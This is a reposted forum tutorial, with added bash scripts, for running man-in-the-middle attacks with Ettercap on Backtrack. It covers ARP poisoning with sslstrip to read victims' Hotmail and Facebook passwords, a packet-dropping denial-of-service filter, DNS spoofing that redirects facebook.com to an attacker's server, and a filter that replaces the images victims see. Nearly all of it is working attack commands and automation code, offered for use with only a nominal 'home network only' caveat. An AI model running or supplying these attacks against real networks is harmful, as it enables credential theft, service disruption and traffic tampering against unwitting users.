----I DID NOT MAKE THIS TUTORIAL. I originally had the tutorial saved from another forum, but when the forum was replaced and the tutorial was gone I decided to repost it here so other people could see it.----
Only test this on your home network, nowhere else. This guide is more of a reference for launching a man-in-the-middle attack to view the traffic of victims on the network using Ettercap together with sslstrip, which downgrades HTTPS links and redirects to plain HTTP so that traffic which was supposed to be encrypted can be read. I have done this on wired and wireless LANs using Backtrack 5.
To begin we want to enable packet forwarding with this command:
echo 1 > /proc/sys/net/ipv4/ip_forward
Then cat the file to check that it is enabled: the command prints 1 if forwarding is enabled and 0 if it is not.
cat /proc/sys/net/ipv4/ip_forward
We will now edit the Ettercap configuration file, etter.conf, so that it uses iptables. In Backtrack the file is located at:
/etc/etter.conf
Uncomment the two lines that follow the statement "if you use iptables" by removing the leading # from each of them (the two redir_command lines below), but leave the # on the "if you use iptables" line itself, since that one is only a comment:
#if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
In the same file also change the ec_uid and ec_gid numbers to zero so that Ettercap keeps running as root instead of dropping to the nobody user after startup:
[privs]
ec_uid = 0 # nobody is the default
ec_gid = 0 # nobody is the default
Now use this iptables command to add a NAT rule that redirects TCP traffic destined for port 80 to port 8080, where sslstrip will be listening:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
Once we have scanned the network for targets and know which IP address belongs to which host, we can begin the poisoning and become the man in the middle. The following starts Ettercap against a range of IP addresses with the autoadd plugin, which means victims who join the network, or reconnect to it after you began the scan, are poisoned as well. In this example 192.168.1.1 is the router and Ettercap will poison targets up to 192.168.1.5. If you are on a wireless network, all you have to do is tell Ettercap to use your wireless interface with -i wlan0 (wlan0 is my wireless interface).
sudo ettercap -Tq -M arp:remote /192.168.1.1-5/ -P autoadd
or, less specifically, poison everyone in the subnet. Be careful: this can bring a network to a crawl:
ettercap -TqM ARP:REMOTE // //
Now tell sslstrip to listen (-l) on port 8080; -a makes it log all the traffic it sees rather than only POST requests:
sslstrip -a -l 8080
Now watch people's Hotmail, Facebook and other passwords that are supposedly protected by SSL roll in as they log in. Ettercap displays the credentials it sniffs from the now-plaintext sessions, and sslstrip writes everything it handled to sslstrip.log. Keep in mind that sslstrip can only downgrade a session that begins with a plain-HTTP request it gets to rewrite; a site whose HSTS policy the browser already knows will not be downgraded. Now let's dig deeper and manipulate people's packets as they are routed through our computer.
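The steps above (forwarding, etter.conf, the iptables redirect, sslstrip and Ettercap) done as one script, as an added example that is not part of the original tutorial. It edits etter.conf from a backup copy so you can diff the two, checks the forwarding flag after setting it, and on exit removes the iptables rule, kills sslstrip and puts the forwarding flag back to what it was. The interface eth0, the target range and the file paths are assumed defaults that you override through the environment; the target syntax is the 0.7.x form used in the tutorial.

```bash
#!/bin/bash
# Added example, not from the original tutorial: run the sslstrip MITM setup
# with checks and clean up on exit. Defaults below are assumptions; override
# them in the environment (IFACE=wlan0 TARGETS='/192.168.1.1-20/' ./mitm.sh run).
set -eu

IFACE="${IFACE:-eth0}"
TARGETS="${TARGETS:-/192.168.1.1-5/}"          # ettercap 0.7.x MAC/IP/PORT form
ETTER_CONF="${ETTER_CONF:-/etc/etter.conf}"
SSLSTRIP_PORT="${SSLSTRIP_PORT:-8080}"
IPFWD_FILE="${IPFWD_FILE:-/proc/sys/net/ipv4/ip_forward}"

# Succeeds when the forwarding flag file ($1, default the real one) holds "1".
ip_forward_enabled() {
    [ "$(cat "${1:-$IPFWD_FILE}")" = "1" ]
}

# Write an edited copy of etter.conf: strip the leading "#" from the two
# redir_command lines only (the "# if you use iptables:" comment stays) and
# force ec_uid/ec_gid to 0 so Ettercap keeps root. Reads $1, writes $2.
patch_etter_conf() {
    sed -e 's/^#\(redir_command_on[[:space:]]*=\)/\1/' \
        -e 's/^#\(redir_command_off[[:space:]]*=\)/\1/' \
        -e 's/^ec_uid[[:space:]]*=[[:space:]]*[0-9]*/ec_uid = 0/' \
        -e 's/^ec_gid[[:space:]]*=[[:space:]]*[0-9]*/ec_gid = 0/' \
        "$1" > "$2"
}

# Succeeds when $1 already has both redir lines active and uid/gid set to 0.
etter_conf_ready() {
    grep -q  '^redir_command_on[[:space:]]*=' "$1" &&
    grep -q  '^redir_command_off[[:space:]]*=' "$1" &&
    grep -Eq '^ec_uid[[:space:]]*=[[:space:]]*0([^0-9]|$)' "$1" &&
    grep -Eq '^ec_gid[[:space:]]*=[[:space:]]*0([^0-9]|$)' "$1"
}

# Undo everything run_attack did, whether it ended normally or with Ctrl-C.
cleanup() {
    iptables -t nat -D PREROUTING -p tcp --destination-port 80 \
        -j REDIRECT --to-port "$SSLSTRIP_PORT" 2>/dev/null || true
    [ -n "${SSLSTRIP_PID:-}" ] && kill "$SSLSTRIP_PID" 2>/dev/null || true
    echo "$IPFWD_BEFORE" > "$IPFWD_FILE"     # restore the previous flag value
}

run_attack() {
    [ "$(id -u)" -eq 0 ] || { echo "run as root" >&2; return 1; }
    IPFWD_BEFORE=$(cat "$IPFWD_FILE")
    trap cleanup EXIT
    echo 1 > "$IPFWD_FILE"
    ip_forward_enabled || { echo "could not enable ip_forward" >&2; return 1; }
    if ! etter_conf_ready "$ETTER_CONF"; then
        cp "$ETTER_CONF" "$ETTER_CONF.bak"             # keep the original
        patch_etter_conf "$ETTER_CONF.bak" "$ETTER_CONF"
    fi
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 \
        -j REDIRECT --to-port "$SSLSTRIP_PORT"
    sslstrip -a -l "$SSLSTRIP_PORT" &      # -a: log all traffic, not only POSTs
    SSLSTRIP_PID=$!
    ettercap -i "$IFACE" -Tq -M arp:remote "$TARGETS" // -P autoadd
}

# Only attack when told to, so the functions can also be sourced and tested.
if [ "${1:-}" = "run" ]; then
    run_attack
fi
```

Run it as root with the single argument run; without that argument it only defines the functions, which is what lets you test patch_etter_conf against a copy of the file before touching /etc/etter.conf.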
DOS Attacking with Ettercap
First off, always check that packet forwarding is still enabled: Ettercap changes the kernel forwarding flag while it runs, and after you stop a poison it can be left turned off. Here is the command:
echo 1 > /proc/sys/net/ipv4/ip_forward
Now let's do a DoS attack with Ettercap. First we create a filter script with instructions to drop every packet to or from a target host. Make a file called dos.eft and put these lines in it, changing both 'Target IP' fields to the IP address of your victim (keep the single quotes around the address):
# match packets in either direction for the victim
if (ip.src == 'Target IP' || ip.dst == 'Target IP') {
    drop();                      # discard the packet instead of forwarding it
    kill();                      # and reset the TCP connection on both ends
    msg("Packet Dropped\n");
}
Go to the directory you saved your script in and compile it into an Ettercap filter with this command:
etterfilter dos.eft -o dos.ef
Lastly we become the man in the middle. -F specifies the filter we want to use, in this case dos.ef. I was targeting 192.168.1.112, so I chose it for this example; replace (network interface) with yours, for example eth0 or wlan0:
ettercap -T -q -F dos.ef -M ARP /192.168.1.112/ // -i (network interface)
You should see Ettercap printing lots of "Packet Dropped" messages. ;-)
DNS Spoofing
(Redirecting victim to sites of our choosing with Ettercap)
Now let's redirect our victim to websites of our choosing. First open a new console and change to the directory that holds the dns_spoof configuration file, etter.dns:
/usr/share/ettercap
Enter the following command to open the configuration file so we can edit it. I use gedit, but any editor such as nano or vim will do:
gedit etter.dns
Now see the line that says:
microsoft.com A 198.182.196.56
That line answers the victim's lookup of microsoft.com with 198.182.196.56, so the browser is sent there instead (the A record type is what dns_spoof uses for normal name lookups).
For example, I can redirect the victim to my own malicious web server running on my IP address (192.168.1.118) when they try to visit, let's say, http://www.facebook.com. This example uses a wildcard (*) so that every subdomain of facebook.com is answered with my address. We do this by adding the following line:
*.facebook.com A 192.168.1.118
The wildcard does not match the bare name facebook.com, so add a matching entry for facebook.com itself as well if the victim may type the site without www; the stock etter.dns lists microsoft.com and *.microsoft.com as separate entries for the same reason.
Save it. Now we can issue the actual command that starts Ettercap with the dns_spoof plugin:
ettercap -T -q -M arp:remote -P dns_spoof //
or if we want to target a specific victim IP address use this:
ettercap -i yourinterface -T -q -P dns_spoof -M ARP /herevictimslocalip/ //
Leave that running. Ettercap's output will clearly show each name it spoofs as people are redirected.
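A small helper for editing etter.dns, as an added example that is not from the original tutorial. It validates the hostname and the IPv4 address before writing anything, refuses to add a second A record for a name that already has one, and adds a domain and its wildcard in one go, because dns_spoof's *.example.com pattern does not cover the bare example.com. The file path defaults to the Backtrack location given above; the optional file argument lets you try it on a copy first, and the addresses in the usage line are assumptions.

```bash
#!/bin/bash
# Added example, not from the original tutorial: validated edits to etter.dns.
# ETTER_DNS defaults to the Backtrack path from the text.
set -eu

ETTER_DNS="${ETTER_DNS:-/usr/share/ettercap/etter.dns}"

# Succeeds when $1 is a dotted-quad IPv4 address with every octet in 0..255.
valid_ipv4() {
    printf '%s\n' "$1" | grep -Eq '^[0-9]{1,3}(\.[0-9]{1,3}){3}$' || return 1
    local IFS=. o
    for o in $1; do
        [ "$o" -le 255 ] || return 1
    done
}

# Succeeds when $1 is a hostname of letter/digit/hyphen labels, optionally
# starting with the "*." wildcard that dns_spoof understands.
valid_name() {
    printf '%s\n' "$1" | grep -Eq '^(\*\.)?([A-Za-z0-9-]+\.)+[A-Za-z]{2,}$'
}

# Append "name A ip" to $3 (default ETTER_DNS). Refuses bad names or addresses
# and refuses a second A record for a name that already has one.
add_a_record() {
    local name="$1" ip="$2" file="${3:-$ETTER_DNS}" pat
    valid_name "$name" || { echo "bad name: $name" >&2; return 1; }
    valid_ipv4 "$ip"   || { echo "bad address: $ip" >&2; return 1; }
    pat=$(printf '%s' "$name" | sed 's/[.*]/\\&/g')   # quote . and * for grep
    if [ -f "$file" ] && grep -Eiq "^[[:space:]]*${pat}[[:space:]]+A[[:space:]]+" "$file"; then
        echo "A record for $name already present in $file" >&2
        return 1
    fi
    printf '%-24s A %s\n' "$name" "$ip" >> "$file"
}

# Redirect a domain and all of its subdomains. dns_spoof's "*.example.com"
# pattern does not match the bare "example.com", so both lines are written.
spoof_domain() {
    add_a_record "$1" "$2" "${3:-$ETTER_DNS}"
    add_a_record "*.$1" "$2" "${3:-$ETTER_DNS}"
}

# Usage (addresses assumed): spoof_domain facebook.com 192.168.1.118
```

Source the file and call spoof_domain; once the two lines are in etter.dns, start Ettercap with -P dns_spoof as shown above.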
Change pictures the victim sees as they browse the web
(using an Ettercap filter of course)
In this section I will show you how to work with filters in Ettercap and ultimately change the pictures people see in their browser to ones we have selected. To write your own filters you need to learn the basics of how programming languages work, but for this example I will give you one that I got from the helpful hackers at greyhat security.
Create/edit a new file using the following command:
gedit filter.pic
Copy and paste the following into it, but change the imageshack URL in the replace() lines to the URL of an image you have uploaded with your favourite image host such as tinypic.com or imageshack.com (or one served from your own web server):
# Request side: overwrite Accept-Encoding with junk of the same length so the
# server replies with uncompressed HTML that the reply side can match.
if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
        replace("Accept-Encoding", "Accept-Rubbish!");
        msg("Modified Accept-Encoding!\n");
    }
}
# Reply side: insert our src attribute ahead of the original one; browsers use
# the first src they see.
if (ip.proto == TCP && tcp.src == 80) {
    replace("img src=", "img src=\"http://img405.imageshack.us/img405/328/hacked28hi.png\" ");
    replace("IMG SRC=", "img src=\"http://img405.imageshack.us/img405/328/hacked28hi.png\" ");
    msg("Replaced the picture.\n");
}
# HTTP does not travel over UDP, so this block never matches; it is harmless.
if (ip.proto == UDP && udp.src == 80) {
    replace("img src=", "img src=\"http://img405.imageshack.us/img405/328/hacked28hi.png\" ");
    replace("IMG SRC=", "img src=\"http://img405.imageshack.us/img405/328/hacked28hi.png\" ");
    msg("Replaced the picture.\n");
}
Save and close. In that same console session, run the following command to turn the code into a filter that is readable by Ettercap:
etterfilter filter.pic -o filter.ef
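Both filter sources in this guide (dos.eft from the DoS section and filter.pic just above) generated from parameters and then compiled with etterfilter, as an added example that is not part of the original tutorial. The drop filter takes one or more target addresses and chains them with ||, which is the dos.eft condition extended to a list; the image filter takes the replacement image URL and leaves out the UDP block, since HTTP never arrives over UDP. The addresses and URL in the usage lines are assumptions.

```bash
#!/bin/bash
# Added example, not from the original tutorial: generate the dos.eft and
# filter.pic sources from parameters and compile them with etterfilter.
set -eu

# Print a filter that drops and resets every packet to or from the given IPv4
# addresses. One address gives exactly the dos.eft condition; several are
# chained with ||.
make_drop_filter() {
    local cond="" ip
    [ $# -ge 1 ] || { echo "usage: make_drop_filter IP [IP...]" >&2; return 1; }
    for ip in "$@"; do
        printf '%s\n' "$ip" | grep -Eq '^[0-9]{1,3}(\.[0-9]{1,3}){3}$' \
            || { echo "bad address: $ip" >&2; return 1; }
        cond="${cond:+$cond || }ip.src == '$ip' || ip.dst == '$ip'"
    done
    printf 'if (%s) {\n    drop();\n    kill();\n    msg("Packet Dropped\\n");\n}\n' "$cond"
}

# Print the image-swapping filter for image URL $1. The request side overwrites
# Accept-Encoding with "Accept-Rubbish!" (same 15-byte length, so the packet
# size is unchanged) so the server answers with uncompressed HTML; the reply
# side puts our src attribute in front of the original one.
make_img_filter() {
    local url="$1"
    printf '%s\n' "$url" | grep -Eq '^https?://[^"[:space:]]+$' \
        || { echo "need a URL without quotes or spaces: $url" >&2; return 1; }
    printf '%s\n' \
        'if (ip.proto == TCP && tcp.dst == 80) {' \
        '    if (search(DATA.data, "Accept-Encoding")) {' \
        '        replace("Accept-Encoding", "Accept-Rubbish!");' \
        '        msg("Modified Accept-Encoding!\n");' \
        '    }' \
        '}' \
        'if (ip.proto == TCP && tcp.src == 80) {' \
        "    replace(\"img src=\", \"img src=\\\"$url\\\" \");" \
        "    replace(\"IMG SRC=\", \"img src=\\\"$url\\\" \");" \
        '    msg("Replaced the picture.\n");' \
        '}'
}

# Compile source $1 to $2 with etterfilter when it is installed; otherwise the
# source is left in place for "etterfilter $1 -o $2" on the attack box.
compile_filter() {
    if command -v etterfilter >/dev/null 2>&1; then
        etterfilter "$1" -o "$2"
    else
        echo "etterfilter not found, $1 left uncompiled" >&2
        return 2
    fi
}

# Usage (addresses and URL are assumptions):
#   make_drop_filter 192.168.1.112 192.168.1.113 > dos.eft && compile_filter dos.eft dos.ef
#   make_img_filter http://192.168.1.118/hacked.png > filter.pic && compile_filter filter.pic filter.ef
```

The generated .ef files are used exactly as in the text, with -F on the ettercap command line.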
Now we finally issue the Ettercap command that begins the MITM attack using the picture filter we have created:
sudo ettercap -T -q -F filter.ef -M arp:remote // -P autoadd
Note: Remember to enable packet forwarding before using any of the attacks in this guide. It was mentioned in the first part (the sslstrip section), but here is the command again:
echo 1 > /proc/sys/net/ipv4/ip_forward
TAKEN FROM: http://www.hackcommunity.com/Thread-Ettercap-Man-In-The-MIddle-Attack-SSL-Strip